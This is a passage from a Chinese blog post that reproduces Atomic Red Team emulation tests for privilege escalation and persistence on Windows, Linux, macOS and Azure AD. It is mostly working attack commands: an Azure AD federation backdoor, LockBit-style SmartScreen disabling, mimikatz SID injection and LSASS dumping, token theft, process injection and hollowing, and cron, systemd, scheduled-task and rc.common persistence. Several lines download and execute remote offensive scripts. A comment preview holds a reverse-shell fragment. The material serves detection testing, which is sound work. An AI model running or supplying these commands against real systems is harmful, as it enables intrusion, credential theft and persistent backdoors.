exit 1
}
try {
$domain = Get-AzureADDomain -Name "#{domain_name}"
}
catch {
Write-Host "Error: domain ""#{domain_name}"" not found"
exit 1
}
if (-Not $domain.IsVerified) {
Write-Host "Error: domain ""#{domain_name}"" not verified"
exit 1
}
if ($domain.AuthenticationType -eq "Federated") {
Write-Host "Error: domain ""#{domain_name}"" already federated. Try with a different domain or re-create it before."
exit 1
}
$at = Get-AADIntAccessTokenForAADGraph -Credentials $Credential
if (-Not $at) {
Write-Host "Error: AADInternals could not connect"
exit 1
}
$new = ConvertTo-AADIntBackdoor -AccessToken $at -DomainName "#{domain_name}"
if ($new) {
Write-Host "Federation successfully added to Azure AD"
Write-Host $new
}
else {
Write-Host "The federation setup failed"
}
Write-Host "End of federation configuration."
--------------------------------------------------------------------------------
T1484.001
DOMAIN POLICY MODIFICATION: GROUP POLICY MODIFICATION
* Atomic Test #1 - LockBit Black - Modify Group policy settings -cmd
* Atomic Test #2 - LockBit Black - Modify Group policy settings -Powershell
LOCKBIT BLACK - MODIFY GROUP POLICY SETTINGS -CMD
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeDC /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffsetDC /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTime /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffset /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v EnableSmartScreen /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v ShellSmartScreenLevel /t REG_SZ /d Block /f
LOCKBIT BLACK - MODIFY GROUP POLICY SETTINGS -POWERSHELL
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeDC -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeOffsetDC -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTime -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeOffset -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name EnableSmartScreen -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name ShellSmartScreenLevel -Force
--------------------------------------------------------------------------------
T1134.005
ACCESS TOKEN MANIPULATION: SID-HISTORY INJECTION
* Atomic Test #1 - Injection SID-History with mimikatz
INJECTION SID-HISTORY WITH MIMIKATZ
#{mimikatz_path} "privilege::debug" "sid::patch" "sid::add /sid:#{sid_to_inject} /sam:#{sam_account_name}" "exit"
--------------------------------------------------------------------------------
T1134.004
ACCESS TOKEN MANIPULATION: PARENT PID SPOOFING
* Atomic Test #1 - Parent PID Spoofing using PowerShell
* Atomic Test #2 - Parent PID Spoofing - Spawn from Current Process
* Atomic Test #3 - Parent PID Spoofing - Spawn from Specified Process
* Atomic Test #4 - Parent PID Spoofing - Spawn from svchost.exe
* Atomic Test #5 - Parent PID Spoofing - Spawn from New Process
PARENT PID SPOOFING USING POWERSHELL
. $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
$ppid=Get-Process #{parent_process_name} | select -expand id
PPID-Spoof -ppid $ppid -spawnto "#{spawnto_process_path}" -dllpath "#{dll_path}"
PARENT PID SPOOFING - SPAWN FROM CURRENT PROCESS
Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}' -ParentId #{parent_pid}
PARENT PID SPOOFING - SPAWN FROM SPECIFIED PROCESS
Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid #{test_guid}
PARENT PID SPOOFING - SPAWN FROM SVCHOST. EXE
Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId -Filter "Name = 'svchost.exe' AND CommandLine LIKE '%'" | Select-Object -First 1 | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}'
PARENT PID SPOOFING - SPAWN FROM NEW PROCESS
Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}'
--------------------------------------------------------------------------------
T1134.002
CREATE PROCESS WITH TOKEN
* Atomic Test #1 - Access Token Manipulation
* Atomic Test #2 - WinPwn - Get SYSTEM shell - Pop System Shell using Token
Manipulation technique
ACCESS TOKEN MANIPULATION
Set-ExecutionPolicy -Scope Process Bypass -Force
$owners = @{}
gwmi win32_process |% {$owners[$_.handle] = $_.getowner().user}
Get-Process | Select ProcessName,Id,@{l="Owner";e={$owners[$_.id.tostring()]}}
$PathToAtomicsFolder\T1134.002\src\GetToken.ps1; [MyProcess]::CreateProcessFromParent((Get-Process lsass).Id,"cmd.exe")
WINPWN - GET SYSTEM SHELL - POP SYSTEM SHELL USING TOKEN MANIPULATION TECHNIQUE
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/TokenManipulation/Get-WinlogonTokenSystem.ps1');Get-WinLogonTokenSystem
--------------------------------------------------------------------------------
T1134.001
ACCESS TOKEN MANIPULATION: TOKEN IMPERSONATION/THEFT
* Atomic Test #1 - Named pipe client impersonation
* Atomic Test #2 - SeDebugPrivilege token duplication
* Atomic Test #3 - Launch NSudo Executable
* Atomic Test #4 - Bad Potato
NAMED PIPE CLIENT IMPERSONATION
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose
SEDEBUGPRIVILEGE TOKEN DUPLICATION
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose
LAUNCH NSUDO EXECUTABLE
Start-Process #{nsudo_path} -Argument "-U:T -P:E cmd"
Start-Sleep -Second 5
Stop-Process -Name "cmd" -force -erroraction silentlycontinue
BAD POTATO
cd PathToAtomicsFolder\..\ExternalPayloads
Start-Process .\BadPotato.exe notepad.exe
Start-Sleep -Second 20
Stop-Process -Name "notepad" -force -erroraction silentlycontinue
Stop-Process -Name "BadPotato" -force -erroraction silentlycontinue
--------------------------------------------------------------------------------
T1055
PROCESS INJECTION
* Atomic Test #1 - Shellcode execution via VBA
* Atomic Test #2 - Remote Process Injection in LSASS via mimikatz
* Atomic Test #3 - Section View Injection
SHELLCODE EXECUTION VIA VBA
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "#{txt_path}" -officeProduct "Word" -sub "Execute"
REMOTE PROCESS INJECTION IN LSASS VIA MIMIKATZ
#{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit"
SECTION VIEW INJECTION
$notepad = Start-Process notepad -passthru
Start-Process $PathToAtomicsFolder\T1055\bin\x64\InjectView.exe
--------------------------------------------------------------------------------
T1055.012
PROCESS INJECTION: PROCESS HOLLOWING
* Atomic Test #1 - Process Hollowing using PowerShell
* Atomic Test #2 - RunPE via VBA
PROCESS HOLLOWING USING POWERSHELL
. $PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1
$ppid=Get-Process #{parent_process_name} | select -expand id
Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose
RUNPE VIA VBA
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1055.012\src\T1055.012-macrocode.txt" -officeProduct "#{ms_product}" -sub "Exploit"
--------------------------------------------------------------------------------
T1055.004
PROCESS INJECTION: ASYNCHRONOUS PROCEDURE CALL
* Atomic Test #1 - Process Injection via C#
PROCESS INJECTION VIA C#
PathToAtomicsFolder\T1055.004\bin\T1055.exe|
--------------------------------------------------------------------------------
T1055.003
THREAD EXECUTION HIJACKING
* Atomic Test #1 - Thread Execution Hijacking
THREAD EXECUTION HIJACKING
$notepad = Start-Process notepad -passthru
Start-Process $PathToAtomicsFolder\T1055.003\bin\InjectContext.exe
Start-Sleep -Seconds 5
Stop-Process $notepad.id
--------------------------------------------------------------------------------
T1055.001
PROCESS INJECTION: DYNAMIC-LINK LIBRARY INJECTION
* Atomic Test #1 - Process Injection via mavinject.exe
* Atomic Test #2 - WinPwn - Get SYSTEM shell - Bind System Shell using
UsoClient DLL load technique
PROCESS INJECTION VIA MAVINJECT. EXE
$mypid = #{process_id}
mavinject $mypid /INJECTRUNNING #{dll_payload}
Stop-Process -processname notepad
WINPWN - GET SYSTEM SHELL - BIND SYSTEM SHELL USING USOCLIENT DLL LOAD TECHNIQUE
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/UsoDLL/Get-UsoClientDLLSystem.ps1')
--------------------------------------------------------------------------------
T1053.007
KUBERNETES CRONJOB
* Atomic Test #1 - ListCronjobs
* Atomic Test #2 - CreateCronjob
LISTCRONJOBS
kubectl get cronjobs -n #{namespace}
CREATECRONJOB
kubectl create -f src/cronjob.yaml -n #{namespace}
--------------------------------------------------------------------------------
T1053.006
SCHEDULED TASK/JOB: SYSTEMD TIMERS
* Atomic Test #1 - Create Systemd Service and Timer
* Atomic Test #2 - Create a user level transient systemd service and timer
* Atomic Test #3 - Create a system level transient systemd service and timer
CREATE SYSTEMD SERVICE AND TIMER
echo "[Unit]" > #{path_to_systemd_service}
echo "Description=Atomic Red Team Systemd Timer Service" >> #{path_to_systemd_service}
echo "[Service]" >> #{path_to_systemd_service}
echo "Type=simple" >> #{path_to_systemd_service}
echo "ExecStart=/bin/touch /tmp/art-systemd-timer-marker" >> #{path_to_systemd_service}
echo "[Install]" >> #{path_to_systemd_service}
echo "WantedBy=multi-user.target" >> #{path_to_systemd_service}
echo "[Unit]" > #{path_to_systemd_timer}
echo "Description=Executes Atomic Red Team Systemd Timer Service" >> #{path_to_systemd_timer}
echo "Requires=#{systemd_service_name}" >> #{path_to_systemd_timer}
echo "[Timer]" >> #{path_to_systemd_timer}
echo "Unit=#{systemd_service_name}" >> #{path_to_systemd_timer}
echo "OnCalendar=*-*-* *:*:00" >> #{path_to_systemd_timer}
echo "[Install]" >> #{path_to_systemd_timer}
echo "WantedBy=timers.target" >> #{path_to_systemd_timer}
systemctl start #{systemd_timer_name}
systemctl enable #{systemd_timer_name}
systemctl daemon-reload
CREATE A USER LEVEL TRANSIENT SYSTEMD SERVICE AND TIMER
systemd-run --user --unit=Atomic-Red-Team --on-calendar '*:0/1' /bin/sh -c 'echo "$(date) $(whoami)" >>/tmp/log'
CREATE A SYSTEM LEVEL TRANSIENT SYSTEMD SERVICE AND TIMER
systemd-run --unit=Atomic-Red-Team --on-calendar '*:0/1' /bin/sh -c 'echo "$(date) $(whoami)" >>/tmp/log'
--------------------------------------------------------------------------------
T1053.005
SCHEDULED TASK/JOB: SCHEDULED TASK
* Atomic Test #1 - Scheduled Task Startup Script
* Atomic Test #2 - Scheduled task Local
* Atomic Test #3 - Scheduled task Remote
* Atomic Test #4 - Powershell Cmdlet Scheduled Task
* Atomic Test #5 - Task Scheduler via VBA
* Atomic Test #6 - WMI Invoke-CimMethod Scheduled Task
* Atomic Test #7 - Scheduled Task Executing Base64 Encoded Commands From
Registry
* Atomic Test #8 - Import XML Schedule Task with Hidden Attribute
* Atomic Test #9 - PowerShell Modify A Scheduled Task
SCHEDULED TASK STARTUP SCRIPT
schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
SCHEDULED TASK LOCAL
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
SCHEDULED TASK REMOTE
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
POWERSHELL CMDLET SCHEDULED TASK
$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object
TASK SCHEDULER VIA VBA
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
WMI INVOKE-CIMMETHOD SCHEDULED TASK
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
SCHEDULED TASK EXECUTING BASE64 ENCODED COMMANDS FROM REGISTRY
reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}
IMPORT XML SCHEDULE TASK WITH HIDDEN ATTRIBUTE
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
POWERSHELL MODIFY A SCHEDULED TASK
$Action = New-ScheduledTaskAction -Execute "cmd.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTaskModifed -InputObject $object
$NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction
--------------------------------------------------------------------------------
T1053.003
SCHEDULED TASK/JOB: CRON
* Atomic Test #1 - Cron - Replace crontab with referenced file
* Atomic Test #2 - Cron - Add script to all cron subfolders
* Atomic Test #3 - Cron - Add script to /var/spool/cron/crontabs/ folder
CRON - REPLACE CRONTAB WITH REFERENCED FILE
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
CRON - ADD SCRIPT TO ALL CRON SUBFOLDERS
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
CRON - ADD SCRIPT TO /VAR/SPOOL/CRON/CRONTABS/ FOLDER
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
--------------------------------------------------------------------------------
T1053.002
SCHEDULED TASK/JOB: AT
* Atomic Test #1 - At.exe Scheduled task
* Atomic Test #2 - At - Schedule a job
AT.EXE SCHEDULED TASK
at 13:20 /interactive cmd
AT - SCHEDULE A JOB
echo "#{at_command}" | at #{time_spec}
--------------------------------------------------------------------------------
T1037.005
BOOT OR LOGON INITIALIZATION SCRIPTS: STARTUP ITEMS
* Atomic Test #1 - Add file to Local Library StartupItems
ADD FILE TO LOCAL LIBRARY STARTUPITEMS
sudo touch /Library/StartupItems/EvilStartup.plist
--------------------------------------------------------------------------------
T1037.004
BOOT OR LOGON INITIALIZATION SCRIPTS: RC. COMMON
* Atomic Test #1 - rc.common
* Atomic Test #2 - rc.common
* Atomic Test #3 - rc.local
RC. COMMON 1
sudo echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common
RC. COMMON 2
filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi
printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common
echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common
printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common
sudo chmod +x /etc/rc.common
RC. LOCAL
filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi
printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local
echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local
printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local
sudo chmod +x /etc/rc.local
--------------------------------------------------------------------------------
T1037.002
BOOT OR LOGON INITIALIZATION SCRIPTS: LOGON SCRIPT (MAC)
* Atomic Test #1 - Logon Scripts - Mac
LOGON SCRIPTS - MAC
1. Create the required plist file
sudo touch /private/var/root/Library/Preferences/com.apple.loginwindow.plist
2. Populate the plist with the location of your shell script
sudo defaults write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh
3. Create the required plist file in the target user's Preferences directory
touch /Users/$USER/Library/Preferences/com.apple.loginwindow.plist
4. Populate the plist with the location of your shell script
defaults write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh
--------------------------------------------------------------------------------
T1037.001
BOOT OR LOGON INITIALIZATION SCRIPTS: LOGON SCRIPT (WINDOWS)
* Atomic Test #1 - Logon Scripts
LOGON SCRIPTS
echo "#{script_command}" > #{script_path}
REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}" /f
迷茫的人生,需要不断努力,才能看清远方模糊的志向!
分类: 安全
标签: Att&ck , 安全
好文要顶 关注我 收藏该文
皇帽讲绿帽带法技巧
粉丝 - 74 关注 - 6
+加关注
0
0
« 上一篇: Atomic-凭据访问
» 下一篇: Atomic-持久化
posted @ 2023-06-28 13:53 皇帽讲绿帽带法技巧 阅读(41) 评论(0) 编辑 收藏 举报
会员救园
刷新页面返回顶部
登录后才能查看或发表评论,立即 登录 或者 逛逛 博客园首页
【推荐】阿里云金秋云创季:云服务器新秀99元/年,百款产品满减折上折
【推荐】实现有效的信息安全,网络安全需要采取新方案
编辑推荐:
· pnpm 管理依赖包是如何节省磁盘空间的?
· 深度分析 C# 中 Array 的存储结构
· 如何实现一套简单的 oauth2 授权码类型认证
· 你所不知道的 ASP.NET Core 进阶系列(三)
· C# 中 Dictionary< TKey, TValue > 的存储结构分析
阅读排行:
· 一套开源、强大且美观的WPF UI控件库 - HandyControl
· 自研 Fast.ORM 已全面支持AOT编译
· 在ASP.NET Core 中使用 .NET Aspire 消息传递组件
· .NET周刊【11月第3期 2023-11-19】
· CPF C#跨平台UI框架开源了
公告
昵称: 皇帽讲绿帽带法技巧
园龄: 8年11个月
粉丝: 74
关注: 6
+加关注
< 2023年11月 >
日 一 二 三 四 五 六 29 30 31 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22
23 24 25 26 27 28 29 30 1 2 3 4 5 6 7 8 9
搜索
常用链接
* 我的随笔
* 我的评论
* 我的参与
* 最新评论
* 我的标签
我的标签
* 安全(125)
* 逆向(120)
* PMP(51)
* 数据安全(36)
* 应急响应(21)
* Linux(17)
* Win32(15)
* CISP-DSG(12)
* Att&ck(11)
* 基线(6)
* 更多
随笔分类 (475)
* 安全(475)
随笔档案 (500)
* 2023年8月(2)
* 2023年7月(2)
* 2023年6月(9)
* 2023年4月(1)
* 2023年2月(1)
* 2022年12月(2)
* 2022年8月(39)
* 2022年7月(43)
* 2022年6月(23)
* 2022年5月(9)
* 2022年4月(4)
* 2022年3月(12)
* 2022年2月(4)
* 2022年1月(2)
* 2021年12月(20)
* 2021年11月(5)
* 2021年9月(14)
* 2021年8月(8)
* 2021年7月(2)
* 2021年6月(6)
* 2021年5月(13)
* 2021年4月(22)
* 2021年3月(4)
* 2021年2月(2)
* 2021年1月(9)
* 2020年12月(36)
* 2020年11月(27)
* 2020年10月(35)
* 2020年9月(56)
* 2020年8月(34)
* 2020年7月(20)
* 2020年6月(20)
* 2016年12月(2)
* 2016年1月(4)
* 2015年12月(8)
* 更多
阅读排行榜
* 1. Openssh算法协议上的漏洞修复-Diffie-Hellman Key Agreement Protocol
资源管理错误漏洞(CVE-2002-20001) (14053)
* 2. hping3使用介绍及DoS测试(3418)
* 3. sqlmap从入门到精通-第四章-4-3 使用sqlmap直连MySQL获取webshell(2971)
* 4. sqlmap从入门到精通-第五章-5-4 使用sqlmap进行Oracle数据库注入与防御(2876)
* 5. 常用的反弹shell脚本(2564)
评论排行榜
* 1. HTB-靶机-Help(4)
* 2. HTB-靶机-Ariekei(4)
* 3. HTB-靶机-Beep(3)
* 4. 滴水逆向-RVA和FOA直接互相转换(2)
* 5. 滴水逆向-手动解析PE头&PE头字段说明及课后练习(2)
推荐排行榜
* 1. 《数据安全实践指南》- 数据质量管理(1)
* 2. 《数据安全实践指南》- 数据采集安全管理(1)
* 3. 端口转发(隧道)工具合集记录(1)
* 4. proxytunnel-简易使用(1)
* 5. HTB-靶机-FluJab(1)
最新评论
* 1. Re:Vulnhub-靶机-KIOPTRIX: 2014 (#5)
* 讲的很好,网上大部分的人都没说msf一把,但是需要UA限制。
* --Master_寒蝉
* 2. Re:sqlmap从入门到精通-第一章-2-4-sqlmap使用攻略及技巧(1)
* 你是真的牛
* --半夜求神写代码
* 3. Re:滴水逆向-手动解析PE节表及说明
* 指针本身就为无符号的整型,为啥指针前面要加无符号
* --汁汁小汉堡
* 4. Re:HTB-靶机-OneTwoSeven
* 想问问,博主是怎么知道curl的发送规则的? curl -H 'Cookie: PHPSESSID=pe7ckkejqtn5bofpbqp249tmv3'
-H 'Host: onetwoseven....
* --xiongacv
* 5. Re:HTB-靶机-Ariekei
* 这段代码在哪执行啊?本地机?python shocker.py -H 172.24.0.2 --command "/bin/bash -i >
/dev/tcp/172.24.0.253/8833 0...
* --xiongacv
Copyright © 2023 皇帽讲绿帽带法技巧
Powered by .NET 8.0 on Kubernetes
点击右上角即可分享